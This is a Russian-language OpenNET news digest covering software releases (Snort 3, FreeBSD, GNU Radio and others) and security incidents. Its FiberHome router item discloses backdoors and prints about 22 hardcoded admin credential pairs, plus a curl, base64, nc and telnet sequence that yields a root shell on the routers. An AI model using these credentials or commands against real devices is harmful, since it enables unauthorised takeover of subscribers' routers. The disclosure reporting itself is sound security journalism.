The OpenNET Project / Index page

[ новости /+++ | форум | wiki | теги | ]

20.01 Релиз системы обнаружения атак Snort 3
  После пятнадцати лет разработки компания Cisco представила первый стабильный релиз полностью переработанной системы предотвращения атак Snort 3, способной анализировать трафик в режиме реального времени и вести детальный лог пакетов для последующего разбора инцидентов. В ветке Snort 3, также известной как проект Snort++, полностью переосмыслена концепция продукта и переработана архитектура. Код проекта написан на языке С++ и распространяется под лицензией GPLv2.

Среди ключевых направлений развития Snort 3: упрощение настройки и запуска Snort, автоматизация конфигурирования, упрощения языка построения правил, автоматическое определение всех протоколов, предоставления оболочки для управления из командной строки, активное применение многопоточности с совместным доступом разных обработчиков к единой конфигурации.

Основные изменения:

  • Осуществлён переход на новую систему конфигурации, предлагающую упрощённый синтаксис и позволяющую использовать скрипты для динамического формирования настроек. Для обработки файлов конфигурации используется LuaJIT. Предоставляются плагины на базе LuaJIT с реализацией дополнительных опций для правил и системы ведения логов;
  • Модернизирован движок определения атак, актуализированы правила, добавлена возможность привязки буферов в правилах (sticky buffers). Задействован поисковый движок Hyperscan, позволивший использовать в правилах быстрые и более точно срабатывающие шаблоны на основе регулярных выражений;
  • Добавлен новый режим интроспекции для HTTP, учитывающий состояние сеанса и охватывающий 99% ситуаций, поддерживаемых тестовым набором HTTP Evader. Добавлена система инспектирования трафика HTTP/2;
  • Существенно увеличена производительность режима глубокого инспектирования пакетов. Добавлена возможность многопоточной обработки пакетов, допускающая одновременное выполнение нескольких нитей с обработчиками пакетов и обеспечивающая линейную масштабируемость в зависимости от числа ядер CPU;
  • Реализовано общее хранилище конфигурации и таблицы атрибутов, которое совместно используется в разных подсистемах, что позволило заметно снизить потребления памяти благодаря исключению дублирования информации;
  • Новая система журналирования событий, использующая формат JSON и легко интегрируемая с внешними платформами, такими как Elastic Stack;
  • Переход на модульную архитектуру, возможность расширения функциональности через подключение плагинов и реализация ключевых подсистем в виде заменяемых плагинов. В настоящее время для Snort 3 уже реализовано несколько сотен плагинов, охватывающих различные области применения, например, позволяющие добавить собственные кодеки, режимы интроспекции, методы журналирования, действия и опции в правилах;
  • Автоматическое определение работающих служб, избавляющее от необходимости ручного указания активных сетевых портов.
  • Добавлена поддержка файлов для быстрого переопределения настроек, относительно конфигурации по умолчанию. Для упрощения настройки прекращено использование snort_config.lua и SNORT_LUA_PATH. Добавлена поддержка перезагрузки настроек на лету;
  • В коде обеспечена возможность использования конструкций C++, определённых в стандарте C++14 (для сборки требуется компилятор, поддерживающий C++14);
  • Добавлен новый обработчик VXLAN;
  • Улучшен поиск типов контента по содержимому с использованием обновлённых альтернативных реализаций алгоритмов Бойера-Мура и Hyperscan;
  • Ускорен запуск за счёт использования нескольких потоков для компиляции групп правил;
  • Добавлен новый механизм ведения логов;
  • Добавлена система инспектирования RNA (Real-time Network Awareness), собирающая сведения о доступных в сети ресурсах, хостах, приложениях и сервисах.
    1. Главная ссылка к новости
    2. OpenNews: Релиз системы обнаружения атак Snort 2.9.17.0
    3. OpenNews: Cloudflare представил открытый сканер сетевой безопасности Flan Scan
    4. OpenNews: Google опубликовал код сканера безопасности Tsunami
    5. OpenNews: Выпуск сканера сетевой безопасности Nmap 7.90
    6. OpenNews: Выпуск системы обнаружения атак Suricata 6.0
Обсуждение | Тип: Программы |


19.01 Отчёт о развитии FreeBSD за четвёртый квартал 2020 года (71 +19)
  Опубликован отчёт о развитии проекта FreeBSD с октября по декабрь 2020 года. Из изменений можно отметить:
  • Общие и системные вопросы
    • Основой репозиторий с исходными текстами, а также репозиторий с документацией, переведены из централизованной системы управления исходными текстами Subversion в децентрализованную систему Git (git.freebsd.org). Разработка ветки 13.0-CURRENT переведена на использование Git. Сборка веток stable/11 и stable/12 продолжается из Subversion. Репозиторий с портами планируется перевести на Git в марте 2021 года.
    • Продолжена работа по избавлению базовой системы FreeBSD от компонентов с лицензией GPL. За отчётный период из базовой системы удалён отладчик gdb (остался порт devel/gdb), вместо которого предложен отладчик lldb от проекта LLVM. Утилита gnugrep заменена на bsdgrep. Удалена библиотека libgnuregex. Рассматриваются варианты для замены dialog и gcov. Оценивается возможность замены diff3 на аналог от проекта OpenBSD.
    • Компания NetApp инициировала процесс переноса улучшений и исправлений из операционной системы ONTAP во FreeBSD. В ходе данной работы сообщество получит возможность использования наработок, реализованных в ONTAP за последние годы, а компания NetApp сократит трудозатраты по переносу новых возможностей FreeBSD в дерево исходных текстов ONTAP. За отчётный период в ядро FreeBSD передано около 40 исправлений, затрагивающих такие подсистемы, как geom, dev, amd64, net, kern и netinet.
    • На основе грантов от организации FreeBSD Foundation проведена работа по улучшению поддержки WiFi, добавлению сжатия Zstd в OpenZFS, улучшению поддержки отладчика LLDB, расширению совместимости Linuxulator с приложениями, использованию Syzkaller для fuzzing-тестирования ядра, расширению инструментария для формата ELF, применению фреймворка Capsicum для защиты различных утилит (например, got и sort), улучшению применения для рабочего стола (например, решены проблемы в приложениях OBS и Firefox, улучшена поддержка программ для работы со звуком), переводу FreeBSD/arm64 в число первичных архитектур, улучшению работы на системах RISC-V, повышению стабильности сетевого стека и расширению возможностей утилиты freebsd-update.
    • В инфраструктуре эмуляции окружения Linux (Linuxulator) продолжается работа по решению проблем с функционированием конкретных Linux-приложений. Последнее время работа в Linuxulator переключилась c консольных программ на улучшения поддержки графических приложений. Для обеспечения возможности запуска Linux-приложений в пакетах AppImages подсистема FUSE FreeBSD адаптирована для использования с FUSE-серверами Linux. Добавлена поддержка SO_PASSCRED в setsockopt(2), обработка флагов CLONE_FS и CLONE_FILES, а также поддержка опций PR_SETDUMPABLE и PR_GETDUMPABLE в prctl(2), что наряду с другими улучшениями позволило добиться работы Linux-сборок программ на базе движка Chromium.
    • В рамках инициативы по замене GDB на LLDB ведётся работа по достижению паритета в функциональности с GDB отладочного окружения на основе LLDB. Для 32- и 64-разрядных систем x86 выполнен переход на новую модель отладки, при которой отладчик работает не в одном пространстве с отлаживаемым процессом, а запускается в форме отдельного процесса lldb-server, что повышает надёжность, унифицирует удалённую и локальную отладку и упрощает модель работы с потоками/процессами в LLDB. Реализованные изменения планируется включить в состав LLDB 12.0 и предложить пользователям в выпуске FreeBSD 13.0.
    • Используемый в базовой системе инструментарий Clang/LLVM обновлён до выпуска 11. При сборке включён флаг "-fstack-clash-protection" для применения защиты от пересечения стека и кучи.
  • Безопасность
    • В ядро и пользовательское окружение FreeBSD принят код драйвера и инструментария VPN WireGuard. Для организации работы VPN предложен работающий на уровне ядра драйвер "if_wg" с реализацией протокола WireGuard и специфичного сетевого интерфейса, а также модифицированный вариант утилиты ifconfig для настройки туннеля. Реализация совместима со всеми официальными клиентами WireGuard для Linux, Windows, macOS, *BSD, iOS и Android.
    • Проведена работа по актуализации пакета OpenBSM с открытой реализации API Sun Basic Security Module (BSM), предоставляющего средства для управления аудитом системы. OpenBSM содержит компоненты пространства пользователя, базирующиеся на реализации CAPP Audit в macOS. В настоящее время изменения для OpenBSM переносятся из кода macOS Catalina, но к выпуску FreeBSD 13 планируется осуществить синхронизацию с macOS Big Sur (несмотря на публикацию исходных текстов, компания Apple не предоставляет списки изменений, поэтому приходится вручную сравнивать различия в коде).
    • Предложена новая реализации генератора псевдослучайных чисел Fenestras X, основанная на архитектуре генератора из Windows 10. Отличия от старого генератора сводятся к разделению наборов случайных последовательностей для разных ядер CPU (не требуется блокировка общего набора), древовидной структуре генераторов и возможности буферизации для повышения производительности. Новый генератор добавлен во FreeBSD-CURRENT, но отключён по умолчанию и требует пересборки ядра с опцией RANDOM_FENESTRASX (по умолчанию предлагается старый генератор Fortuna).
    • Для архитектуры AMR64 предложен новый криптографический драйвер ossl, использующий специализированные инструкции CPU для аппаратного ускорения операций с хэшами SHA-1 и SHA-2.
  • Сетевая подсистема
    • Повышена эффективность проверки записей в таблицах маршрутизации и реализован модульный фреймворк "fib IP lookup", позволяющий динамически подключать алгоритмы для поиска маршрутов и менять алгоритмы в зависимости от размера таблицы маршрутизации. Например, для очень крупных таблиц предложен модуль pdk_lpm4/6 с реализацией алгоритма DIR-24-8 для IPv4/IPv6. Для подключения также подготовлены модули radix4/6 (старый базовый алгоритм), bsearch4 (эффективен для очень маленьких таблиц, до 16 записей) и radix4/6_lockless (для таблиц с менее чем 1000 записями). Прирост производительности перенаправления трафика для маленьких таблиц при использовании модуля bsearch4 составляет примерно 10-15%, для крупных таблиц при использовании модуля dpdk_lpm4 - 25%.
    • Добавлена и включена по умолчанию масштабируемая реализация multipath-маршрутизации (позволяет организовать доставку пакетов одновременно по нескольким маршрутам через разные сетевые интерфейсы, привязанные к разным IP-адресам и разным шлюзам). Новая реализация базируется на концепции Nexthop и отличается решением проблем со стабильностью, более высокой производительностью, эффективным использованием кэширования и низким потреблением памяти.
    • В пакетном фильтре pf повышена эффективность кэширования и принято около десятка патчей, существенно повышающие производительность в некоторых ситуациях.
    • Проект k8s-bhyve, нацеленный на предоставление инструментов для развёртывания инфраструктуры оркестровки контейнеров Kubernetes в окружении FreeBSD/bhyve, опубликовал установочный образ на базе ISO/memstick.
  • Системы хранения и файловые системы
    • Продолжается работа по реализации возможности работы NFS поверх шифрованного канала связи на базе TLS 1.3, вместо использования Kerberos (режим sec=krb5p), который ограничивается шифрованием только RPC-сообщений и реализуется только программно. Новая реализация использует предоставляемый ядром стек TLS, позволяющий задействовать средства аппаратного ускорения. Код уже готов для тестирования, но требует сборки ядра с опцией "options KERN_TLS", доступной только в ветке head/FreeBSD13. Основным ограничением остаётся применение TLS 1.2, а не TLS 1.3, как того требует спецификация. Данное ограничение будет снято после принятия в состав FreeBSD патча KERN_TLS rx с поддержкой TLS 1.3.
    • В механизме асинхронного ввода/вывода POSIX AIO представлена поддержка векторизированных функций. В частности, добавлены системные вызовы aio_writev и aio_readv, позволяющие реализовать асинхронные эквиваленты функций pwritev и preadv, принимающие массив элементов iovec.
    • В ZFS реализована поддержка алгоритма сжатия Zstandard (ZSTD). Изменения вошли в состав выпуска OpenZFS 2.0, а также интегрированы в ветку FreeBSD-CURRENT и добавлены в загрузчик FreeBSD.
  • Поддержка оборудования
    • Подготовлен стек драйверов для USB 4.0 и протокола Thunderbolt 3. Интерфейс USB 4.0 позволяет туннелировать различные протоколы поверх одного кабеля с разъёмом Type-C, включая PCIe, Display Port и USB 3.x, а также допускает программные реализации протоколов, например, для организации сетевых линков между хостами. В текущем виде обеспечена поддержка контроллеров Alpine Ridge и Ice Lake TBT3, а также базовой проверки ограничений безопасности и учёта топологии. Ещё не завершена работа над управлением питанием и менеджером соединений (Connection Manager), который отвечает за создание туннелей для подключения нескольких устройств через один разъём.
    • Запущен проект по обновлению драйвера для беспроводных карт Intel, нацеленный на добавление поддержки новых чипов и стандарта 802.11ac. Реализация базируется на Linux-драйвере и коде из Linux-подсистемы net80211, работа которого во FreeBSD обеспечивается при помощи прослойки linuxkpi.
    • До версии 2.3 обновлён драйвер ena с поддержкой второго поколения сетевых адаптеров ENAv2 (Elastic Network Adapter), используемых в инфраструктуре Elastic Compute Cloud (EC2) для организации связи между узлами EC2 на скоростях до 100 Gb/s.
    • Продолжается усовершенствование портов FreeBSD для платформ ARM64, powerpc64 и RISC-V.
    • Продолжается работа над CheriBSD, ответвлением от FreeBSD для исследовательской процессорной архитектуры CHERI (Capability Hardware Enhanced RISC Instructions). Уже почти готова адаптация для процессора ARM Morello, который будет поддерживать систему управления доступом к памяти CHERI, основанную на модели защиты проекта Capsicum. Чип Morello планируют выпустить в 2021 году. Продолжается развитие CheriBSD для эталонного прототипа CHERI на базе архитектуры MIPS64 и порта для архитектуры RISC-V.
  • Приложения и система портов
    • Коллекция портов FreeBSD преодолела рубеж в 41500 портов, число незакрытых PR составляет 2516, из которых 625 PR ещё не разобраны. За отчётный период в ветку HEAD внесено 8715 изменений от 164 разработчиков. Права коммиттера портов получил Juray Lutter (otis). Лишились прав коммитеры cpm, jadawin, knu, araujo, mmokhi и scottl.

      Изменены веосии портов по умолчанию: Mono 5.10, FPC 3.2.0, Lazarus 2.0.10, Ruby 2.7.x, Samba 4.12. Обновлены Ruby 2.7.2, Firefox 84.0.1, Chromium 87.0.4280.88, XFce 4.16, Qt5 5.15.2. Добавлена новая категория портов "education" с образовательными программами. На языке Lua переписаны обработчики ключевых слов @shell и @sample. При сборке для платформы powerpc64le задействован GCC 10. Ведётся работа по задействованию по умолчанию локали на C.UTF-8

    • Python 2.7 намечен для удаления из коллекции портов. Время жизни порта lang/python27 истекло 31 декабря 2020 года, но порт ещё не удалён, так как с ним напрямую связано около 40 других портов, среди которых www/chromium, devel/electron7 и www/qt5-webengine (ранее было удалено около 740 устаревших портов, несовместимых с Python 3).
    • В состав принята универсальная утилита ping, которая может работать с IPv6 и IPv4 (ранее для IPv6 поставлялась отдельная утилита ping6).
    • Порт с рабочим столом Xfce обновлён до версии 4.16.
    • Рабочий стол KDE Plasma, KDE Frameworks, KDE Applications и Qt поддерживаются в актуальном состоянии и обновлены до свежих выпусков. Библиотека Qt обновлена до версии 5.12.2.
    • Офисный пакет LibreOffice обновлён до версии 7.0.4, реализована поддержка LibreOffice 7.1.0.0.beta1.
    • Доступен новый выпуск Bastille, системы управления контейнерами на основе FreeBSD Jail.

  1. Главная ссылка к новости
  2. OpenNews: Проект FreeBSD анонсировал переход на Git в ближайшие дни
  3. OpenNews: Во FreeBSD добавлена поддержка VPN WireGuard
  4. OpenNews: Релиз FreeBSD 12.2
  5. OpenNews: Реализована возможность сборки FreeBSD в других операционных системах
  6. OpenNews: Кодовая база FreeBSD переведена на использование OpenZFS (ZFS on Linux)
Обсуждение (71 +19) | Тип: Обобщение |


19.01 Argos Translate - программа для машинного перевода с поддержкой русского языка (92 +37)
  Компания Argos Open Technologies подготовила новый выпуск программы Argos Translate для машинного перевода текста с использованием методов машинного обучения. Код написан на языке Python и распространяется под лицензией MIT. Для Linux подготовлен пакет в формате snap. Для перевода можно использовать утилиту командной строки, GUI на базе PyQt, Python-библиотеку и сервер LibreTranslate, позволяющий на своих мощностях запускать web-сервисы, похожие на Google Translate. Оценить качество перевода можно на сайте libretranslate.com.

Программа работает самодостаточно, не привязана к облачным сервисам и применяет для перевода движок OpenNMT. Для генерации текста задействован токенизатор SentencePiece, а для определения границ предложений библиотека Stanza. Готовые модели машинного обучения подготовлены (torrent) для 9 языков, включая русский.

  1. Главная ссылка к новости
  2. OpenNews: Проект OpenNMT развивает систему машинного перевода на основе нейронной сети
  3. OpenNews: Система машинного обучения для синтеза типового кода на языке Java
  4. OpenNews: Facebook опубликовал открытую систему распознавания речи Wav2letter++
  5. OpenNews: Mozilla развивает собственную систему машинного перевода
  6. OpenNews: Facebook развивает TransCoder для перевода кода с одного языка программирования на другой
Обсуждение (92 +37) | Тип: Программы |


18.01 Взлом форума проекта OpenWRT (72 +6)
  Разработчики дистрибутива OpenWRT уведомили пользователей о взломе форума проекта (forum.openwrt.org). Примерно в 7 утра (MSK) 16 января неизвестные злоумышленники смогли получить доступ к учётной записи администратора форума. Каким образом была скомпрометирована учётная запись - не ясно, заявлено, что был установлен надёжный пароль, но не была включена двухфакторная аутентификация.

В ходе атаки злоумышленники смогли загрузить список, включающий параметры пользователей, такие как имена, email и статистику работы с форумом. Прямых доказательств утечки полной базы пользователей не найдено, но для предосторожности выполнен сброс всех паролей пользователей форума и очищены все ключи доступа к API. Отмечается, что форум работал отдельно от Wiki-сайта openwrt.org, и их базы данных не пересекались.

  1. Главная ссылка к новости
  2. OpenNews: Обновление OpenWrt 19.07.1 с устранением уязвимости, допускающей подмену пакетов
  3. OpenNews: Взлом инфраструктуры LineageOS через уязвимость в SaltStack
  4. OpenNews: Форум и web-сервисы дистрибутива Sabayon Linux подверглись взлому
  5. OpenNews: Форум проекта openSUSE подвергся взлому
  6. OpenNews: Взломан официальный форум проекта Ubuntu
Обсуждение (72 +6) | Тип: Проблемы безопасности |


18.01 Бэкдор в маршрутизаторах FiberHome (65 +23)
  В маршрутизаторах FiberHome, применяемых провайдерами для подключения абонентов к оптическим линиям связи GPON, выявлено 17 проблем с безопасностью, среди которых наличие бэкдоров с предопределёнными учётными данными, позволяющими удалённо управлять оборудованием. Проблемы дают возможность удалённому атакующему получить root-доступ к устройству без прохождения аутентификации. Наличие уязвимостей подтверждено в устройствах FiberHome HG6245D и RP2602, а также частично в устройствах AN5506-04-*, но не исключено, что проблемы затрагивают и другие модели маршрутизаторов данной компании, которые не проверялись.

Отмечается, что по умолчанию доступ по IPv4 к интерфейсу администратора на изученных устройствах ограничен внутренним сетевым интерфейсом, допускающим обращение только из локальной сети, но при этом доступ по IPv6 никак не ограничен, что позволяет использовать присутствующие бэкдоры при обращении по IPv6 из внешней сети.

Кроме web-интерфейса, работающего через HTTP/HTTPS, на устройствах предусмотрена функция для удалённой активации интерфейса командной строки, к которому можно обращаться по протоколу telnet. CLI активируется отправкой специального запроса по протоколу HTTPS с предопределёнными учётными данными. Кроме того, в http-сервере, обслуживающем web-интерфейс, выявлена уязвимость (переполнение стека), эксплуатируемая через отправку запроса со специально оформленным значением HTTP Cookie.

Всего исследователем выявлено 17 проблем с безопасностью, из которых 7 затрагивают HTTP-сервер, 6 - сервер telnet, а остальные связаны с общесистемными брешами. Производитель был уведомлен о выявленных проблемах год назад, но информации об исправлении не поступило. Среди выявленных проблем:

  • Утечка информации о подсетях, прошивке, идентификаторе соединения FTTH , IP- и MAC-адресах на стадии до прохождения аутентификации.
  • Сохранение в логе паролей пользователей в открытом виде.
  • Хранение открытым текстом учётных данных для подключения к беспроводным сетям и паролей.
  • Переполнение стека в HTTP-сервере.
  • Присутствие в прошивке закрытого ключа для SSL-сертификатов, который можно загрузить по HTTPS ("curl https://host/privkeySrv.pem").
  • Бэкдор для активации telnet - в коде http-сервера присутствует специальный обработчик запросов "/telnet", а также обработчик "/fh" для привилегированного доступа.
  • Жёстко заданные в прошивке инженерные пароли и параметры аутентификации. Всего в коде http-сервера было выявлено 23 прошитых учётных записей, привязанных к разным провайдерам. Пароли использовались в обработчике https://ip/fh для активации telnet:
    • user / user1234
    • f~i!b@e#r$h%o^m*esuperadmin / s(f)u_h+g|u
    • admin / lnadmin
    • admin / CUadmin
    • admin / admin
    • telecomadmin / nE7jA%5m
    • adminpldt / z6dUABtl270qRxt7a2uGTiw
    • gestiontelebucaramanga / t3l3buc4r4m4ng42013
    • rootmet / m3tr0r00t
    • awnfibre / fibre@dm!n
    • trueadmin / admintrue
    • admin / G0R2U1P2ag
    • admin / 3UJUh2VemEfUtesEchEC2d2e
    • admin / c 6 по 32 символы MAC-адреса на интерфейсе br0
    • admin / 888888
    • L1vt1m4eng / 888888
    • useradmin / 888888
    • user / 888888
    • admin / 1234
    • user / tattoo@home
    • admin / tele1234
    • admin / aisadmin
  • Дополнительно в CLI-интерфейсе можно запустить на 26 сетевом порту отдельный процесс telnetd с правами root, передав последовательность команд "�,help,list,who,ddd,tshell" ('GgpoZWxwCmxpc3QKd2hvCg==' в base64). Для подключения к telnet определён общий пароль "GEPON".

В простейшем случае для получения root-доступа к маршрутизатору достаточно отправить несколько запросов при помощи утилиты curl:


   # Получаем информацию о MAC-адресе, через API, доступный без аутентификации:

    curl -k https://target/info.asp 

   # Используем хвост MAC-адреса в качестве ключа для снятия в пакетном фильтре блокировки доступа к CLI-интерфейсу по протоколу telnet:

    сurl -k 'https://target/telnet?enable=1&key=ENDING_PART_MAC_ADDR'  

   # Отправляем в CLI-интерфейс на 23 порт последовательность команд для запуска процесса telnetd.
                                      
    echo GgpoZWxwCmxpc3QKd2hvCmRkZAp0c2hlbGwK | base64 -d | nc target 23 >/dev/null &
                                                                                        
   # Подключаемся к сетевому порту 26 по протоколу telnet с логином root и паролем  GEPON.                                                                             

    telnet target 26
   
    (none) login: root
    Password: [GEPON]
    BusyBox v1.27.2 (2019-04-01 19:16:06 CST) built-in shell (ash)
    #id
    uid=0(root) gid=0 groups=0 # game over

  1. Главная ссылка к новости
  2. OpenNews: Уязвимости в маршрутизаторах GPON, которые уже используются для создания ботнета
  3. OpenNews: В межсетевых экранах Juniper выявлен бэкдор с функциями расшифровки трафика VPN
  4. OpenNews: В Webmin найден бэкдор, позволяющий удалённо получить доступ с правами root
  5. OpenNews: Результаты анализа бэкдоров в приложениях для Android
  6. OpenNews: Бэкдор в межсетевых экранах и контроллерах точек доступа Zyxel
Обсуждение (65 +23) | Тип: Проблемы безопасности |


18.01 Релиз goredo 1.0.0, реализации системы сборки redo, предложенной DJB (68 +20)
  Состоялся первый значительный релиз goredo - реализации системы сборки redo, предложенной Дэниелем Бернштейном (DJB) в качестве замены утилите Make. Goredo написан на языке Go и распространяются под лицензией GPLv3.

Redo решает фундаментальные проблемы и устраняет недостатки Make, такие как:

  • отсутствие атомарной сборки целей из коробки;
  • практическая неработоспособность (как минимум, при распараллеливании сборок) при использовании рекурсивных вызовов Make (Recursive Make Considered Harmful (by Peter Miller)), из-за отсутствия блокировок или глобального состояния;
  • потенциальная неработоспособность определения устаревания зависимости при использовании технологий mmap, NFS, FUSE, VCS из-за использования mtime;
  • невозможность динамически задавать зависимости;
  • отсутствие автоматической зависимости от правила сборки, сложность создания зависимостей от переменных окружения;
  • невозможность иметь цели с пробелами в именах.

По сравнению с другими системами сборки, redo:

  • имеет минимальный порог вхождения: не требует изучения нового языка, синтаксиса или диалекта: для большинства проектов достаточно знать и использовать ровно одну дополнительную команду redo-ifchange. Полное описание redo может уместиться на одной странице экрана;
  • полностью независим от используемого языка программирования и языка описания целей: по умолчанию они пишутся на POSIX shell, но могут быть на чём угодно другом, включая бинарные исполняемые скомпилированные программы;
  • может задавать зависимости на несуществующие цели (redo-ifcreate);
  • очень прост в реализации: может быть реализован в 100 SLoC на POSIX shell или 1 kLoC на чистом C, с возможностью распараллеливания и продолжения сборок, включая полную реализацию хэша SHA256;
  • не требует установки каких-либо дополнительных программ (на BSD-системы бывает приходится ставить GNU Make) для конечного пользователя: реализация apenwarr/minimal/do на чистом POSIX shell занимает 1/3 размера лицензии GPLv3 и может быть просто включена внутрь архива программы.

Отличием goredo от других реализаций redo является:

  • различные user-friendly sanity/safety проверки некорректного поведения целей;
  • возможность записи stderr вывода целей на диск, с TAI64N временными штампами;
  • распараллеливание сборок, опционально без ограничения на количество задач;
  • дружелюбность к umask;
  • высокая скорость работы, особенно по сравнению с популярной реализацией apenwarr/redo;
  • состояние сборок сохраняется в человекочитаемых и удобных для машинной обработки recfile;
  • прохождение функциональных тестов из реализаций apenwarr/redo и redo.sh.

  1. Главная ссылка к новости
  2. OpenNews: Релиз NNCP 5.0.0, утилит для передачи файлов/почты в режиме store-and-forward
  3. OpenNews: Релиз свободного безопасного цензуроустойчивого VPN-демона GoVPN 4.0
  4. OpenNews: Дэниел Бернштейн выступил с критикой позиции ФБР о шифровании смартфонов и сетей
  5. OpenNews: Дэниэл Бернштейн выступил с инициативой создания Си-компилятора для защищённого ПО
  6. OpenNews: Представлен notqmail, форк почтового сервера qmail
Обсуждение (68 +20) | Автор: stargrave | Тип: Программы |


18.01 Ошибка в патчах FreeNAS, вызывающая скрытое повреждение данных в ZFS (171 +23)
  В добавленных дистрибутивом FreeNAS/TrueNAS патчах к OpenZFS 2.0 выявлена серьёзная ошибка, приводящая к скрытому повреждению данных в ZFS-разделах (zvol). Во FreeNAS/TrueNAS проблема проявлялась в двух последних обновлениях 12.0 и 12.1 (FreeNAS 11.3 проблеме не подвержен) и была вызвана включением недостаточно протестированного кода. В мае прошлого года включающее ошибку изменение было передано в основной git-репозиторий OpenZFS, но не вошло в основную ветку, так как ожидало рецензирования и не прошло автоматизированную проверку сборки на некоторых платформах.

Вначале представители компании iXsystems, разрабатывающей проект FreeNAS, не могли повторить условия, приводящие к потере данных, списывали проблему на неправильный бэкплейн и советовали обновить в нем прошивку, хотя изначально в сообщении о проблемах было сказано, что до перехода с FreeNAS 11.3 на TrueNAS 12.0 две разные системы в таком виде семь лет проработали без единого сбоя. После подтверждения возникновения проблемы ещё у нескольких пользователей ошибку наконец удалось локализовать и выпустить обновление модуля openzfs.ko, которое вчера было включено в состав обновления TrueNAS 12.0-U1.1.

Кроме того, в ходе обсуждения всплыла ещё одна давно не решённая проблема в основном коде OpenZFS, приводившая к обнулению файлов в резервной копии при передаче командой "zfs send" и проявляющаяся начиная с версии 0.7.5, опубликованной в конце 2017 года.

  1. Главная ссылка к новости
  2. OpenNews: Уязвимость в OpenZFS, нарушающая обработку прав доступа во FreeBSD
  3. OpenNews: Выявлена несовместимость SMR-дисков WD с ZFS, которая может привести к потере данных
  4. OpenNews: Линус Торвальдс пояснил, в чём проблемы реализации ZFS для ядра Linux
  5. OpenNews: Проблема с потерей данных на SSD при использовании ядра Linux 5.1, LVM и dm-crypt
  6. OpenNews: Новая проблема в SSD-накопителях HPE, приводящая к потере данных через 40000 часов
Обсуждение (171 +23) | Автор: . | Тип: Тема для размышления |


18.01 Выпуск GNU Radio 3.9.0 (39 +21)
  После полутора лет разработки сформирован новый значительный релиз свободной платформы цифровой обработки сигналов GNU Radio 3.9. Платформа включает набор программ и библиотек, позволяющих создавать произвольные радиосистемы, схемы модуляции и форма принимаемых и отправляемых сигналов в которых задаются программно, а для захвата и генерации сигналов применяются простейшие аппаратные устройства. Проект распространяется под лицензией GPLv3. Код большей части компонентов GNU Radio написан на языке Python, части, критичные к производительности и времени задержки, написаны на языке С++, что позволяет использовать пакет при решении задач в режиме реального времени.

В комбинации с универсальными программируемыми приёмопередатчиками, не привязанными к полосе частот и типу модуляции сигнала, платформа может быть использована для создания таких устройств, как базовые станции для сетей GSM, устройства для дистанционного чтения RFID-меток (электронные удостоверения и пропуски, смарт-карты), GPS-ресиверы, WiFi, приемники и передатчики FM-радио, TV-декодеры, пассивные радары, спектральные анализаторы и т.п. Кроме USRP, пакет может использовать и другие аппаратные компоненты для ввода и вывода сигналов, например, доступны драйверы для звуковых карт, TV-тюнеров, устройств BladeRF, Myriad-RF, HackRF, UmTRX, Softrock, Comedi, Funcube, FMCOMMS, USRP и S-Mini.

В состав также входит коллекция фильтров, канальных кодеков, модулей синхронизации, демодуляторов, эквалайзеров, голосовых кодеков, декодеров и других элементов, необходимых для создания радиосистем. Указанные элементы могут быть использованы как кирпичики для компоновки готовой системы, что в сочетании с возможностями по определению потоков данных между блоками позволяет проектировать радиосистемы даже без навыков программирования.

Основные изменения:

  • Внесены изменения в организацию разработки. Для участия в разработке больше не требуется подписание CLA-соглашения, вместо которого разработчику необходимо лишь подтвердить, что он имеет право на передачу кода и не пытается присвоить себе чужой код. Для оформления передачи кода применяется документ Developer Certificate of Origin (DCO), который с 2004 года используется при передаче изменений в состав ядра Linux. Для отслеживания автора к каждому изменению прикрепляется строка "Signed-off-by: имя и email разработчика" (git commit -s). Прикрепляя данную подпись к патчу, разработчик подтверждает своё авторство над передаваемым кодом и соглашается с его распространением в составе проекта или как части кода под свободной лицензией.
  • Разрешено использование конструкций из стандарта C++14, но в коде, где продолжает использоваться Boost, продолжают применяться конструкции C++11. Кроме того, в код добавлены заголовки с информацией о лицензии в формате SPDX. Сборочные сценарии адаптированы для создания повторяемых сборок.
  • Прекращено применение генератора программных интерфейсов SWIG. Для связывания кода на С/C++ и Python теперь применяется PyBind11, который требует написания дополнительного кода, но обеспечивает более предсказуемый и стабильный результат. Вместе с переходом на PyBind проведена большая работа по модернизации кода графического интерфейса GRC (GNU Radio Companion).
  • Добавлен новый модуль gr-network для создания сетевых блоков, поддерживающий TCP и UDP.
  • В графический интерфейс gr-qtgui добавлены графики для азимута, расстояния и автокорреляции, обеспечена визуализация компаса, добавлена вертикальная панель.
  • Добавлена поддержка UHD 4.0 (USRP hardware driver) и предложен новый API для создания фильтров.
  • Прекращена поддержка Python 2, для работы теперь требуется как минимум Python 3.6.5. Обновлены зависимости: numpy 1.13.3, VOLK 2.4.1, CMake 3.10.2, Boost 1.65, Mako 1.0.7, PyBind11 2.4.3. Из компиляторов поддерживаются GCC 8.3.0, Clang 11.0.0 и MSVC 1910 (Microsoft VS 2017 15.0). В число зависимостей включена библиотека libsndfile. Из субмодулей в отдельную зависимость перенесён VOLK (Vector Optimized Library of Kernels).

  1. Главная ссылка к новости
  2. OpenNews: Выпуск GNU Radio 3.8.0
  3. OpenNews: GNU Radio помог восстановить контроль над космическим аппаратом ISEE-3
  4. OpenNews: Опубликован код для организации передачи данных между ноутбуками в ультразвуковом диапазоне
  5. OpenNews: Анонсирован проект OsmocomGMR с открытой реализацией протокола GMR
  6. OpenNews: Доступна новая модель универсальной открытой платформы для создания радиосистем
Обсуждение (39 +21) | Тип: Программы |


18.01 Выпуск Venus 0.9, реализации платформы хранения FileCoin (57 +7)
  Состоялся выпуск проекта Venus 0.9, развивающего эталонную реализацию программного обеспечения для создания узлов децентрализованной системы хранения FileCoin, базирующейся на протоколе IPFS (InterPlanetary File System). Код написан на языке Go и распространяется под лицензиями MIT и Apache 2.0. Поддерживается работа в Linux и macOS (в планах поддержка Windows).

Filecoin даёт возможность пользователям, у которых имеется неиспользуемое дисковое пространство, за определённое вознаграждение предоставить его сети, а пользователям, которым нужно место для хранения, купить его. Если необходимость в месте исчезла, пользователь может продать его. Таким образом формируется рынок места в хранилище, расчёты в котором производятся в токенах Filecoin, образуемых при помощи майнинга.

Отличие хранилища FileCoin от децентрализованной файловой системы IPFS сводится к тому, что IPFS позволяет построить P2P-сеть для сохранения и передачи данных между участниками, а FileCoin представляет собой платформу для постоянного хранения, основанную на технологиях блокчейна. Для узлов, осуществляющих подтверждение изменений, вносимых в блокчейн, требуется как минимум 8 ГБ ОЗУ. Для майнинга рекомендуется наличие как можно большего объёма памяти и ресурсов GPU - майнинг основан на хранении данных пользователей ("Proof of space-time", учитывается размер хранимых данных и активность их использования), а также вычислении криптографических подтверждений для сохраняемых данных.

  1. Главная ссылка к новости
